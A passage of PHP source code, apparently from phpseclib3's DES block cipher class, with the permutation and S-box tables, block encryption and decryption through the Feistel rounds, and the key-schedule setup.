'des-cfb', self::MODE_OFB => 'des-ofb' // self::MODE_CTR is undefined for DES ]; /** * Optimizing value while CFB-encrypting * * @see \phpseclib3\Crypt\Common\SymmetricKey::cfb_init_len * @var int */ protected $cfb_init_len = 500; /** * Switch for DES/3DES encryption * * Used only if $engine == self::ENGINE_INTERNAL * * @see self::setupKey() * @see self::processBlock() * @var int */ protected $des_rounds = 1; /** * max possible size of $key * * @see self::setKey() * @var string */ protected $key_length_max = 8; /** * The Key Schedule * * @see self::setupKey() * @var array */ private $keys; /** * Key Cache "key" * * @see self::setupKey() * @var array */ private $kl; /** * Shuffle table. * * For each byte value index, the entry holds an 8-byte string * with each byte containing all bits in the same state as the * corresponding bit in the index value. * * @see self::processBlock() * @see self::setupKey() * @var array */ protected static $shuffle = [ "\x00\x00\x00\x00\x00\x00\x00\x00", "\x00\x00\x00\x00\x00\x00\x00\xFF", "\x00\x00\x00\x00\x00\x00\xFF\x00", "\x00\x00\x00\x00\x00\x00\xFF\xFF", "\x00\x00\x00\x00\x00\xFF\x00\x00", "\x00\x00\x00\x00\x00\xFF\x00\xFF", "\x00\x00\x00\x00\x00\xFF\xFF\x00", "\x00\x00\x00\x00\x00\xFF\xFF\xFF", "\x00\x00\x00\x00\xFF\x00\x00\x00", "\x00\x00\x00\x00\xFF\x00\x00\xFF", "\x00\x00\x00\x00\xFF\x00\xFF\x00", "\x00\x00\x00\x00\xFF\x00\xFF\xFF", "\x00\x00\x00\x00\xFF\xFF\x00\x00", "\x00\x00\x00\x00\xFF\xFF\x00\xFF", "\x00\x00\x00\x00\xFF\xFF\xFF\x00", "\x00\x00\x00\x00\xFF\xFF\xFF\xFF", "\x00\x00\x00\xFF\x00\x00\x00\x00", "\x00\x00\x00\xFF\x00\x00\x00\xFF", "\x00\x00\x00\xFF\x00\x00\xFF\x00", "\x00\x00\x00\xFF\x00\x00\xFF\xFF", "\x00\x00\x00\xFF\x00\xFF\x00\x00", "\x00\x00\x00\xFF\x00\xFF\x00\xFF", "\x00\x00\x00\xFF\x00\xFF\xFF\x00", "\x00\x00\x00\xFF\x00\xFF\xFF\xFF", "\x00\x00\x00\xFF\xFF\x00\x00\x00", "\x00\x00\x00\xFF\xFF\x00\x00\xFF", "\x00\x00\x00\xFF\xFF\x00\xFF\x00", "\x00\x00\x00\xFF\xFF\x00\xFF\xFF", "\x00\x00\x00\xFF\xFF\xFF\x00\x00", "\x00\x00\x00\xFF\xFF\xFF\x00\xFF", "\x00\x00\x00\xFF\xFF\xFF\xFF\x00", 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"\xFF\xFF\xFF\xFF\x00\xFF\xFF\xFF", "\xFF\xFF\xFF\xFF\xFF\x00\x00\x00", "\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF", "\xFF\xFF\xFF\xFF\xFF\x00\xFF\x00", "\xFF\xFF\xFF\xFF\xFF\x00\xFF\xFF", "\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00", "\xFF\xFF\xFF\xFF\xFF\xFF\x00\xFF", "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00", "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" ]; /** * IP mapping helper table. * * Indexing this table with each source byte performs the initial bit permutation. * * @var array */ protected static $ipmap = [ 0x00, 0x10, 0x01, 0x11, 0x20, 0x30, 0x21, 0x31, 0x02, 0x12, 0x03, 0x13, 0x22, 0x32, 0x23, 0x33, 0x40, 0x50, 0x41, 0x51, 0x60, 0x70, 0x61, 0x71, 0x42, 0x52, 0x43, 0x53, 0x62, 0x72, 0x63, 0x73, 0x04, 0x14, 0x05, 0x15, 0x24, 0x34, 0x25, 0x35, 0x06, 0x16, 0x07, 0x17, 0x26, 0x36, 0x27, 0x37, 0x44, 0x54, 0x45, 0x55, 0x64, 0x74, 0x65, 0x75, 0x46, 0x56, 0x47, 0x57, 0x66, 0x76, 0x67, 0x77, 0x80, 0x90, 0x81, 0x91, 0xA0, 0xB0, 0xA1, 0xB1, 0x82, 0x92, 0x83, 0x93, 0xA2, 0xB2, 0xA3, 0xB3, 0xC0, 0xD0, 0xC1, 0xD1, 0xE0, 0xF0, 0xE1, 0xF1, 0xC2, 0xD2, 0xC3, 0xD3, 0xE2, 0xF2, 0xE3, 0xF3, 0x84, 0x94, 0x85, 0x95, 0xA4, 0xB4, 0xA5, 0xB5, 0x86, 0x96, 0x87, 0x97, 0xA6, 0xB6, 0xA7, 0xB7, 0xC4, 0xD4, 0xC5, 0xD5, 0xE4, 0xF4, 0xE5, 0xF5, 0xC6, 0xD6, 0xC7, 0xD7, 0xE6, 0xF6, 0xE7, 0xF7, 0x08, 0x18, 0x09, 0x19, 0x28, 0x38, 0x29, 0x39, 0x0A, 0x1A, 0x0B, 0x1B, 0x2A, 0x3A, 0x2B, 0x3B, 0x48, 0x58, 0x49, 0x59, 0x68, 0x78, 0x69, 0x79, 0x4A, 0x5A, 0x4B, 0x5B, 0x6A, 0x7A, 0x6B, 0x7B, 0x0C, 0x1C, 0x0D, 0x1D, 0x2C, 0x3C, 0x2D, 0x3D, 0x0E, 0x1E, 0x0F, 0x1F, 0x2E, 0x3E, 0x2F, 0x3F, 0x4C, 0x5C, 0x4D, 0x5D, 0x6C, 0x7C, 0x6D, 0x7D, 0x4E, 0x5E, 0x4F, 0x5F, 0x6E, 0x7E, 0x6F, 0x7F, 0x88, 0x98, 0x89, 0x99, 0xA8, 0xB8, 0xA9, 0xB9, 0x8A, 0x9A, 0x8B, 0x9B, 0xAA, 0xBA, 0xAB, 0xBB, 0xC8, 0xD8, 0xC9, 0xD9, 0xE8, 0xF8, 0xE9, 0xF9, 0xCA, 0xDA, 0xCB, 0xDB, 0xEA, 0xFA, 0xEB, 0xFB, 0x8C, 0x9C, 0x8D, 0x9D, 0xAC, 0xBC, 0xAD, 0xBD, 0x8E, 0x9E, 0x8F, 0x9F, 0xAE, 0xBE, 0xAF, 0xBF, 0xCC, 0xDC, 0xCD, 0xDD, 0xEC, 0xFC, 0xED, 0xFD, 0xCE, 0xDE, 0xCF, 0xDF, 0xEE, 0xFE, 0xEF, 0xFF ]; /** * Inverse IP mapping helper table. * Indexing this table with a byte value reverses the bit order. * * @var array */ protected static $invipmap = [ 0x00, 0x80, 0x40, 0xC0, 0x20, 0xA0, 0x60, 0xE0, 0x10, 0x90, 0x50, 0xD0, 0x30, 0xB0, 0x70, 0xF0, 0x08, 0x88, 0x48, 0xC8, 0x28, 0xA8, 0x68, 0xE8, 0x18, 0x98, 0x58, 0xD8, 0x38, 0xB8, 0x78, 0xF8, 0x04, 0x84, 0x44, 0xC4, 0x24, 0xA4, 0x64, 0xE4, 0x14, 0x94, 0x54, 0xD4, 0x34, 0xB4, 0x74, 0xF4, 0x0C, 0x8C, 0x4C, 0xCC, 0x2C, 0xAC, 0x6C, 0xEC, 0x1C, 0x9C, 0x5C, 0xDC, 0x3C, 0xBC, 0x7C, 0xFC, 0x02, 0x82, 0x42, 0xC2, 0x22, 0xA2, 0x62, 0xE2, 0x12, 0x92, 0x52, 0xD2, 0x32, 0xB2, 0x72, 0xF2, 0x0A, 0x8A, 0x4A, 0xCA, 0x2A, 0xAA, 0x6A, 0xEA, 0x1A, 0x9A, 0x5A, 0xDA, 0x3A, 0xBA, 0x7A, 0xFA, 0x06, 0x86, 0x46, 0xC6, 0x26, 0xA6, 0x66, 0xE6, 0x16, 0x96, 0x56, 0xD6, 0x36, 0xB6, 0x76, 0xF6, 0x0E, 0x8E, 0x4E, 0xCE, 0x2E, 0xAE, 0x6E, 0xEE, 0x1E, 0x9E, 0x5E, 0xDE, 0x3E, 0xBE, 0x7E, 0xFE, 0x01, 0x81, 0x41, 0xC1, 0x21, 0xA1, 0x61, 0xE1, 0x11, 0x91, 0x51, 0xD1, 0x31, 0xB1, 0x71, 0xF1, 0x09, 0x89, 0x49, 0xC9, 0x29, 0xA9, 0x69, 0xE9, 0x19, 0x99, 0x59, 0xD9, 0x39, 0xB9, 0x79, 0xF9, 0x05, 0x85, 0x45, 0xC5, 0x25, 0xA5, 0x65, 0xE5, 0x15, 0x95, 0x55, 0xD5, 0x35, 0xB5, 0x75, 0xF5, 0x0D, 0x8D, 0x4D, 0xCD, 0x2D, 0xAD, 0x6D, 0xED, 0x1D, 0x9D, 0x5D, 0xDD, 0x3D, 0xBD, 0x7D, 0xFD, 0x03, 0x83, 0x43, 0xC3, 0x23, 0xA3, 0x63, 0xE3, 0x13, 0x93, 0x53, 0xD3, 0x33, 0xB3, 0x73, 0xF3, 0x0B, 0x8B, 0x4B, 0xCB, 0x2B, 0xAB, 0x6B, 0xEB, 0x1B, 0x9B, 0x5B, 0xDB, 0x3B, 0xBB, 0x7B, 0xFB, 0x07, 0x87, 0x47, 0xC7, 0x27, 0xA7, 0x67, 0xE7, 0x17, 0x97, 0x57, 0xD7, 0x37, 0xB7, 0x77, 0xF7, 0x0F, 0x8F, 0x4F, 0xCF, 0x2F, 0xAF, 0x6F, 0xEF, 0x1F, 0x9F, 0x5F, 0xDF, 0x3F, 0xBF, 0x7F, 0xFF ]; /** * Pre-permuted S-box1 * * Each box ($sbox1-$sbox8) has been vectorized, then each value pre-permuted using the * P table: concatenation can then be replaced by exclusive ORs. * * @var array */ protected static $sbox1 = [ 0x00808200, 0x00000000, 0x00008000, 0x00808202, 0x00808002, 0x00008202, 0x00000002, 0x00008000, 0x00000200, 0x00808200, 0x00808202, 0x00000200, 0x00800202, 0x00808002, 0x00800000, 0x00000002, 0x00000202, 0x00800200, 0x00800200, 0x00008200, 0x00008200, 0x00808000, 0x00808000, 0x00800202, 0x00008002, 0x00800002, 0x00800002, 0x00008002, 0x00000000, 0x00000202, 0x00008202, 0x00800000, 0x00008000, 0x00808202, 0x00000002, 0x00808000, 0x00808200, 0x00800000, 0x00800000, 0x00000200, 0x00808002, 0x00008000, 0x00008200, 0x00800002, 0x00000200, 0x00000002, 0x00800202, 0x00008202, 0x00808202, 0x00008002, 0x00808000, 0x00800202, 0x00800002, 0x00000202, 0x00008202, 0x00808200, 0x00000202, 0x00800200, 0x00800200, 0x00000000, 0x00008002, 0x00008200, 0x00000000, 0x00808002 ]; /** * Pre-permuted S-box2 * * @var array */ protected static $sbox2 = [ 0x40084010, 0x40004000, 0x00004000, 0x00084010, 0x00080000, 0x00000010, 0x40080010, 0x40004010, 0x40000010, 0x40084010, 0x40084000, 0x40000000, 0x40004000, 0x00080000, 0x00000010, 0x40080010, 0x00084000, 0x00080010, 0x40004010, 0x00000000, 0x40000000, 0x00004000, 0x00084010, 0x40080000, 0x00080010, 0x40000010, 0x00000000, 0x00084000, 0x00004010, 0x40084000, 0x40080000, 0x00004010, 0x00000000, 0x00084010, 0x40080010, 0x00080000, 0x40004010, 0x40080000, 0x40084000, 0x00004000, 0x40080000, 0x40004000, 0x00000010, 0x40084010, 0x00084010, 0x00000010, 0x00004000, 0x40000000, 0x00004010, 0x40084000, 0x00080000, 0x40000010, 0x00080010, 0x40004010, 0x40000010, 0x00080010, 0x00084000, 0x00000000, 0x40004000, 0x00004010, 0x40000000, 0x40080010, 0x40084010, 0x00084000 ]; /** * Pre-permuted S-box3 * * @var array */ protected static $sbox3 = [ 0x00000104, 0x04010100, 0x00000000, 0x04010004, 0x04000100, 0x00000000, 0x00010104, 0x04000100, 0x00010004, 0x04000004, 0x04000004, 0x00010000, 0x04010104, 0x00010004, 0x04010000, 0x00000104, 0x04000000, 0x00000004, 0x04010100, 0x00000100, 0x00010100, 0x04010000, 0x04010004, 0x00010104, 0x04000104, 0x00010100, 0x00010000, 0x04000104, 0x00000004, 0x04010104, 0x00000100, 0x04000000, 0x04010100, 0x04000000, 0x00010004, 0x00000104, 0x00010000, 0x04010100, 0x04000100, 0x00000000, 0x00000100, 0x00010004, 0x04010104, 0x04000100, 0x04000004, 0x00000100, 0x00000000, 0x04010004, 0x04000104, 0x00010000, 0x04000000, 0x04010104, 0x00000004, 0x00010104, 0x00010100, 0x04000004, 0x04010000, 0x04000104, 0x00000104, 0x04010000, 0x00010104, 0x00000004, 0x04010004, 0x00010100 ]; /** * Pre-permuted S-box4 * * @var array */ protected static $sbox4 = [ 0x80401000, 0x80001040, 0x80001040, 0x00000040, 0x00401040, 0x80400040, 0x80400000, 0x80001000, 0x00000000, 0x00401000, 0x00401000, 0x80401040, 0x80000040, 0x00000000, 0x00400040, 0x80400000, 0x80000000, 0x00001000, 0x00400000, 0x80401000, 0x00000040, 0x00400000, 0x80001000, 0x00001040, 0x80400040, 0x80000000, 0x00001040, 0x00400040, 0x00001000, 0x00401040, 0x80401040, 0x80000040, 0x00400040, 0x80400000, 0x00401000, 0x80401040, 0x80000040, 0x00000000, 0x00000000, 0x00401000, 0x00001040, 0x00400040, 0x80400040, 0x80000000, 0x80401000, 0x80001040, 0x80001040, 0x00000040, 0x80401040, 0x80000040, 0x80000000, 0x00001000, 0x80400000, 0x80001000, 0x00401040, 0x80400040, 0x80001000, 0x00001040, 0x00400000, 0x80401000, 0x00000040, 0x00400000, 0x00001000, 0x00401040 ]; /** * Pre-permuted S-box5 * * @var array */ protected static $sbox5 = [ 0x00000080, 0x01040080, 0x01040000, 0x21000080, 0x00040000, 0x00000080, 0x20000000, 0x01040000, 0x20040080, 0x00040000, 0x01000080, 0x20040080, 0x21000080, 0x21040000, 0x00040080, 0x20000000, 0x01000000, 0x20040000, 0x20040000, 0x00000000, 0x20000080, 0x21040080, 0x21040080, 0x01000080, 0x21040000, 0x20000080, 0x00000000, 0x21000000, 0x01040080, 0x01000000, 0x21000000, 0x00040080, 0x00040000, 0x21000080, 0x00000080, 0x01000000, 0x20000000, 0x01040000, 0x21000080, 0x20040080, 0x01000080, 0x20000000, 0x21040000, 0x01040080, 0x20040080, 0x00000080, 0x01000000, 0x21040000, 0x21040080, 0x00040080, 0x21000000, 0x21040080, 0x01040000, 0x00000000, 0x20040000, 0x21000000, 0x00040080, 0x01000080, 0x20000080, 0x00040000, 0x00000000, 0x20040000, 0x01040080, 0x20000080 ]; /** * Pre-permuted S-box6 * * @var array */ protected static $sbox6 = [ 0x10000008, 0x10200000, 0x00002000, 0x10202008, 0x10200000, 0x00000008, 0x10202008, 0x00200000, 0x10002000, 0x00202008, 0x00200000, 0x10000008, 0x00200008, 0x10002000, 0x10000000, 0x00002008, 0x00000000, 0x00200008, 0x10002008, 0x00002000, 0x00202000, 0x10002008, 0x00000008, 0x10200008, 0x10200008, 0x00000000, 0x00202008, 0x10202000, 0x00002008, 0x00202000, 0x10202000, 0x10000000, 0x10002000, 0x00000008, 0x10200008, 0x00202000, 0x10202008, 0x00200000, 0x00002008, 0x10000008, 0x00200000, 0x10002000, 0x10000000, 0x00002008, 0x10000008, 0x10202008, 0x00202000, 0x10200000, 0x00202008, 0x10202000, 0x00000000, 0x10200008, 0x00000008, 0x00002000, 0x10200000, 0x00202008, 0x00002000, 0x00200008, 0x10002008, 0x00000000, 0x10202000, 0x10000000, 0x00200008, 0x10002008 ]; /** * Pre-permuted S-box7 * * @var array */ protected static $sbox7 = [ 0x00100000, 0x02100001, 0x02000401, 0x00000000, 0x00000400, 0x02000401, 0x00100401, 0x02100400, 0x02100401, 0x00100000, 0x00000000, 0x02000001, 0x00000001, 0x02000000, 0x02100001, 0x00000401, 0x02000400, 0x00100401, 0x00100001, 0x02000400, 0x02000001, 0x02100000, 0x02100400, 0x00100001, 0x02100000, 0x00000400, 0x00000401, 0x02100401, 0x00100400, 0x00000001, 0x02000000, 0x00100400, 0x02000000, 0x00100400, 0x00100000, 0x02000401, 0x02000401, 0x02100001, 0x02100001, 0x00000001, 0x00100001, 0x02000000, 0x02000400, 0x00100000, 0x02100400, 0x00000401, 0x00100401, 0x02100400, 0x00000401, 0x02000001, 0x02100401, 0x02100000, 0x00100400, 0x00000000, 0x00000001, 0x02100401, 0x00000000, 0x00100401, 0x02100000, 0x00000400, 0x02000001, 0x02000400, 0x00000400, 0x00100001 ]; /** * Pre-permuted S-box8 * * @var array */ protected static $sbox8 = [ 0x08000820, 0x00000800, 0x00020000, 0x08020820, 0x08000000, 0x08000820, 0x00000020, 0x08000000, 0x00020020, 0x08020000, 0x08020820, 0x00020800, 0x08020800, 0x00020820, 0x00000800, 0x00000020, 0x08020000, 0x08000020, 0x08000800, 0x00000820, 0x00020800, 0x00020020, 0x08020020, 0x08020800, 0x00000820, 0x00000000, 0x00000000, 0x08020020, 0x08000020, 0x08000800, 0x00020820, 0x00020000, 0x00020820, 0x00020000, 0x08020800, 0x00000800, 0x00000020, 0x08020020, 0x00000800, 0x00020820, 0x08000800, 0x00000020, 0x08000020, 0x08020000, 0x08020020, 0x08000000, 0x00020000, 0x08000820, 0x00000000, 0x08020820, 0x00020020, 0x08000020, 0x08020000, 0x08000800, 0x08000820, 0x00000000, 0x08020820, 0x00020800, 0x00020800, 0x00000820, 0x00000820, 0x00020020, 0x08000000, 0x08020800 ]; /** * Default Constructor. * * @param string $mode * @throws BadModeException if an invalid / unsupported mode is provided */ public function __construct($mode) { parent::__construct($mode); if ($this->mode == self::MODE_STREAM) { throw new BadModeException('Block ciphers cannot be ran in stream mode'); } } /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { if ($this->key_length_max == 8) { if ($engine == self::ENGINE_OPENSSL) { // quoting https://www.openssl.org/news/openssl-3.0-notes.html, OpenSSL 3.0.1 // "Moved all variations of the EVP ciphers CAST5, BF, IDEA, SEED, RC2, RC4, RC5, and DES to the legacy provider" // in theory openssl_get_cipher_methods() should catch this but, on GitHub Actions, at least, it does not if (defined('OPENSSL_VERSION_TEXT') && version_compare(preg_replace('#OpenSSL (\d+\.\d+\.\d+) .*#', '$1', OPENSSL_VERSION_TEXT), '3.0.1', '>=')) { return false; } $this->cipher_name_openssl_ecb = 'des-ecb'; $this->cipher_name_openssl = 'des-' . $this->openssl_translate_mode(); } } return parent::isValidEngineHelper($engine); } /** * Sets the key. * * Keys must be 64-bits long or 8 bytes long. * * DES also requires that every eighth bit be a parity bit, however, we'll ignore that. * * @see \phpseclib3\Crypt\Common\SymmetricKey::setKey() * @param string $key */ public function setKey($key) { if (!($this instanceof TripleDES) && strlen($key) != 8) { throw new \LengthException('Key of size ' . strlen($key) . ' not supported by this algorithm. Only keys of size 8 are supported'); } // Sets the key parent::setKey($key); } /** * Encrypts a block * * @see \phpseclib3\Crypt\Common\SymmetricKey::encryptBlock() * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see self::encrypt() * @param string $in * @return string */ protected function encryptBlock($in) { return $this->processBlock($in, self::ENCRYPT); } /** * Decrypts a block * * @see \phpseclib3\Crypt\Common\SymmetricKey::decryptBlock() * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() * @see self::decrypt() * @param string $in * @return string */ protected function decryptBlock($in) { return $this->processBlock($in, self::DECRYPT); } /** * Encrypts or decrypts a 64-bit block * * $mode should be either self::ENCRYPT or self::DECRYPT. See * {@link http://en.wikipedia.org/wiki/Image:Feistel.png Feistel.png} to get a general * idea of what this function does. * * @see self::encryptBlock() * @see self::decryptBlock() * @param string $block * @param int $mode * @return string */ private function processBlock($block, $mode) { static $sbox1, $sbox2, $sbox3, $sbox4, $sbox5, $sbox6, $sbox7, $sbox8, $shuffleip, $shuffleinvip; if (!$sbox1) { $sbox1 = array_map('intval', self::$sbox1); $sbox2 = array_map('intval', self::$sbox2); $sbox3 = array_map('intval', self::$sbox3); $sbox4 = array_map('intval', self::$sbox4); $sbox5 = array_map('intval', self::$sbox5); $sbox6 = array_map('intval', self::$sbox6); $sbox7 = array_map('intval', self::$sbox7); $sbox8 = array_map('intval', self::$sbox8); /* Merge $shuffle with $[inv]ipmap */ for ($i = 0; $i < 256; ++$i) { $shuffleip[] = self::$shuffle[self::$ipmap[$i]]; $shuffleinvip[] = self::$shuffle[self::$invipmap[$i]]; } } $keys = $this->keys[$mode]; $ki = -1; // Do the initial IP permutation. $t = unpack('Nl/Nr', $block); list($l, $r) = [$t['l'], $t['r']]; $block = ($shuffleip[ $r & 0xFF] & "\x80\x80\x80\x80\x80\x80\x80\x80") | ($shuffleip[($r >> 8) & 0xFF] & "\x40\x40\x40\x40\x40\x40\x40\x40") | ($shuffleip[($r >> 16) & 0xFF] & "\x20\x20\x20\x20\x20\x20\x20\x20") | ($shuffleip[($r >> 24) & 0xFF] & "\x10\x10\x10\x10\x10\x10\x10\x10") | ($shuffleip[ $l & 0xFF] & "\x08\x08\x08\x08\x08\x08\x08\x08") | ($shuffleip[($l >> 8) & 0xFF] & "\x04\x04\x04\x04\x04\x04\x04\x04") | ($shuffleip[($l >> 16) & 0xFF] & "\x02\x02\x02\x02\x02\x02\x02\x02") | ($shuffleip[($l >> 24) & 0xFF] & "\x01\x01\x01\x01\x01\x01\x01\x01"); // Extract L0 and R0. $t = unpack('Nl/Nr', $block); list($l, $r) = [$t['l'], $t['r']]; for ($des_round = 0; $des_round < $this->des_rounds; ++$des_round) { // Perform the 16 steps. for ($i = 0; $i < 16; $i++) { // start of "the Feistel (F) function" - see the following URL: // http://en.wikipedia.org/wiki/Image:Data_Encryption_Standard_InfoBox_Diagram.png // Merge key schedule. $b1 = (($r >> 3) & 0x1FFFFFFF) ^ ($r << 29) ^ $keys[++$ki]; $b2 = (($r >> 31) & 0x00000001) ^ ($r << 1) ^ $keys[++$ki]; // S-box indexing. $t = $sbox1[($b1 >> 24) & 0x3F] ^ $sbox2[($b2 >> 24) & 0x3F] ^ $sbox3[($b1 >> 16) & 0x3F] ^ $sbox4[($b2 >> 16) & 0x3F] ^ $sbox5[($b1 >> 8) & 0x3F] ^ $sbox6[($b2 >> 8) & 0x3F] ^ $sbox7[ $b1 & 0x3F] ^ $sbox8[ $b2 & 0x3F] ^ $l; // end of "the Feistel (F) function" $l = $r; $r = $t; } // Last step should not permute L & R. $t = $l; $l = $r; $r = $t; } // Perform the inverse IP permutation. return ($shuffleinvip[($r >> 24) & 0xFF] & "\x80\x80\x80\x80\x80\x80\x80\x80") | ($shuffleinvip[($l >> 24) & 0xFF] & "\x40\x40\x40\x40\x40\x40\x40\x40") | ($shuffleinvip[($r >> 16) & 0xFF] & "\x20\x20\x20\x20\x20\x20\x20\x20") | ($shuffleinvip[($l >> 16) & 0xFF] & "\x10\x10\x10\x10\x10\x10\x10\x10") | ($shuffleinvip[($r >> 8) & 0xFF] & "\x08\x08\x08\x08\x08\x08\x08\x08") | ($shuffleinvip[($l >> 8) & 0xFF] & "\x04\x04\x04\x04\x04\x04\x04\x04") | ($shuffleinvip[ $r & 0xFF] & "\x02\x02\x02\x02\x02\x02\x02\x02") | ($shuffleinvip[ $l & 0xFF] & "\x01\x01\x01\x01\x01\x01\x01\x01"); } /** * Creates the key schedule * * @see \phpseclib3\Crypt\Common\SymmetricKey::setupKey() */ protected function setupKey() { if (isset($this->kl['key']) && $this->key === $this->kl['key'] && $this->des_rounds === $this->kl['des_rounds']) { // already expanded return; } $this->kl = ['key' => $this->key, 'des_rounds' => $this->des_rounds]; static $shifts = [ // number of key bits shifted per round 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 ]; static $pc1map = [ 0x00, 0x00, 0x08, 0x08, 0x04, 0x04, 0x0C, 0x0C, 0x02, 0x02, 0x0A, 0x0A, 0x06, 0x06, 0x0E, 0x0E, 0x10, 0x10, 0x18, 0x18, 0x14, 0x14, 0x1C, 0x1C, 0x12, 0x12, 0x1A, 0x1A, 0x16, 0x16, 0x1E, 0x1E, 0x20, 0x20, 0x28, 0x28, 0x24, 0x24, 0x2C, 0x2C, 0x22, 0x22, 0x2A, 0x2A, 0x26, 0x26, 0x2E, 0x2E, 0x30, 0x30, 0x38, 0x38, 0x34, 0x34, 0x3C, 0x3C, 0x32, 0x32, 0x3A, 0x3A, 0x36, 0x36, 0x3E, 0x3E, 0x40, 0x40, 0x48, 0x48, 0x44, 0x44, 0x4C, 0x4C, 0x42, 0x42, 0x4A, 0x4A, 0x46, 0x46, 0x4E, 0x4E, 0x50, 0x50, 0x58, 0x58, 0x54, 0x54, 0x5C, 0x5C, 0x52, 0x52, 0x5A, 0x5A, 0x56, 0x56, 0x5E, 0x5E, 0x60, 0x60, 0x68, 0x68, 0x64, 0x64, 0x6C, 0x6C, 0x62, 0x62, 0x6A, 0x6A, 0x66, 0x66, 0x6E, 0x6E, 0x70, 0x70, 0x78, 0x78, 0x74, 0x74, 0x7C, 0x7C, 0x72, 0x72, 0x7A, 0x7A, 0x76, 0x76, 0x7E, 0x7E, 0x80, 0x80, 0x88, 0x88, 0x84, 0x84, 0x8C, 0x8C, 0x82, 0x82, 0x8A, 0x8A, 0x86, 0x86, 0x8E, 0x8E, 0x90, 0x90, 0x98, 0x98, 0x94, 0x94, 0x9C, 0x9C, 0x92, 0x92, 0x9A, 0x9A, 0x96, 0x96, 0x9E, 0x9E, 0xA0, 0xA0, 0xA8, 0xA8, 0xA4, 0xA4, 0xAC, 0xAC, 0xA2, 0xA2, 0xAA, 0xAA, 0xA6, 0xA6, 0xAE, 0xAE, 0xB0, 0xB0, 0xB8, 0xB8, 0xB4, 0xB4, 0xBC, 0xBC, 0xB2, 0xB2, 0xBA, 0xBA, 0xB6, 0xB6, 0xBE, 0xBE, 0xC0, 0xC0, 0xC8, 0xC8, 0xC4, 0xC4, 0xCC, 0xCC, 0xC2, 0xC2, 0xCA, 0xCA, 0xC6, 0xC6, 0xCE, 0xCE, 0xD0, 0xD0, 0xD8, 0xD8, 0xD4, 0xD4, 0xDC, 0xDC, 0xD2, 0xD2, 0xDA, 0xDA, 0xD6, 0xD6, 0xDE, 0xDE, 0xE0, 0xE0, 0xE8, 0xE8, 0xE4, 0xE4, 0xEC, 0xEC, 0xE2, 0xE2, 0xEA, 0xEA, 0xE6, 0xE6, 0xEE, 0xEE, 0xF0, 0xF0, 0xF8, 0xF8, 0xF4, 0xF4, 0xFC, 0xFC, 0xF2, 0xF2, 0xFA, 0xFA, 0xF6, 0xF6, 0xFE, 0xFE ]; // Mapping tables for the PC-2 transformation. static $pc2mapc1 = [ 0x00000000, 0x00000400, 0x00200000, 0x00200400, 0x00000001, 0x00000401, 0x00200001, 0x00200401, 0x02000000, 0x02000400, 0x02200000, 0x02200400, 0x02000001, 0x02000401, 0x02200001, 0x02200401 ]; static $pc2mapc2 = [ 0x00000000, 0x00000800, 0x08000000, 0x08000800, 0x00010000, 0x00010800, 0x08010000, 0x08010800, 0x00000000, 0x00000800, 0x08000000, 0x08000800, 0x00010000, 0x00010800, 0x08010000, 0x08010800, 0x00000100, 0x00000900, 0x08000100, 0x08000900, 0x00010100, 0x00010900, 0x08010100, 0x08010900, 0x00000100, 0x00000900, 0x08000100, 0x08000900, 0x00010100, 0x00010900, 0x08010100, 0x08010900, 0x00000010, 0x00000810, 0x08000010, 0x08000810, 0x00010010, 0x00010810, 0x08010010, 0x08010810, 0x00000010, 0x00000810, 0x08000010, 0x08000810, 0x00010010, 0x00010810, 0x08010010, 0x08010810, 0x00000110, 0x00000910, 0x08000110, 0x08000910, 0x00010110, 0x00010910, 0x08010110, 0x08010910, 0x00000110, 0x00000910, 0x08000110, 0x08000910, 0x00010110, 0x00010910, 0x08010110, 0x08010910, 0x00040000, 0x00040800, 0x08040000, 0x08040800, 0x00050000, 0x00050800, 0x08050000, 0x08050800, 0x00040000, 0x00040800, 0x08040000, 0x08040800, 0x00050000, 0x00050800, 0x08050000, 0x08050800, 0x00040100, 0x00040900, 0x08040100, 0x08040900, 0x00050100, 0x00050900, 0x08050100, 0x08050900, 0x00040100, 0x00040900, 0x08040100, 0x08040900, 0x00050100, 0x00050900, 0x08050100, 0x08050900, 0x00040010, 0x00040810, 0x08040010, 0x08040810, 0x00050010, 0x00050810, 0x08050010, 0x08050810, 0x00040010, 0x00040810, 0x08040010, 0x08040810, 0x00050010, 0x00050810, 0x08050010, 0x08050810, 0x00040110, 0x00040910, 0x08040110, 0x08040910, 0x00050110, 0x00050910, 0x08050110, 0x08050910, 0x00040110, 0x00040910, 0x08040110, 0x08040910, 0x00050110, 0x00050910, 0x08050110, 0x08050910, 0x01000000, 0x01000800, 0x09000000, 0x09000800, 0x01010000, 0x01010800, 0x09010000, 0x09010800, 0x01000000, 0x01000800, 0x09000000, 0x09000800, 0x01010000, 0x01010800, 0x09010000, 0x09010800, 0x01000100, 0x01000900, 0x09000100, 0x09000900, 0x01010100, 0x01010900, 0x09010100, 0x09010900, 0x01000100, 0x01000900, 0x09000100, 0x09000900, 0x01010100, 0x01010900, 0x09010100, 0x09010900, 0x01000010, 0x01000810, 0x09000010, 0x09000810, 0x01010010, 0x01010810, 0x09010010, 0x09010810, 0x01000010, 0x01000810, 0x09000010, 0x09000810, 0x01010010, 0x01010810, 0x09010010, 0x09010810, 0x01000110, 0x01000910, 0x09000110, 0x09000910, 0x01010110, 0x01010910, 0x09010110, 0x09010910, 0x01000110, 0x01000910, 0x09000110, 0x09000910, 0x01010110, 0x01010910, 0x09010110, 0x09010910, 0x01040000, 0x01040800, 0x09040000, 0x09040800, 0x01050000, 0x01050800, 0x09050000, 0x09050800, 0x01040000, 0x01040800, 0x09040000, 0x09040800, 0x01050000, 0x01050800, 0x09050000, 0x09050800, 0x01040100, 0x01040900, 0x09040100, 0x09040900, 0x01050100, 0x01050900, 0x09050100, 0x09050900, 0x01040100, 0x01040900, 0x09040100, 0x09040900, 0x01050100, 0x01050900, 0x09050100, 0x09050900, 0x01040010, 0x01040810, 0x09040010, 0x09040810, 0x01050010, 0x01050810, 0x09050010, 0x09050810, 0x01040010, 0x01040810, 0x09040010, 0x09040810, 0x01050010, 0x01050810, 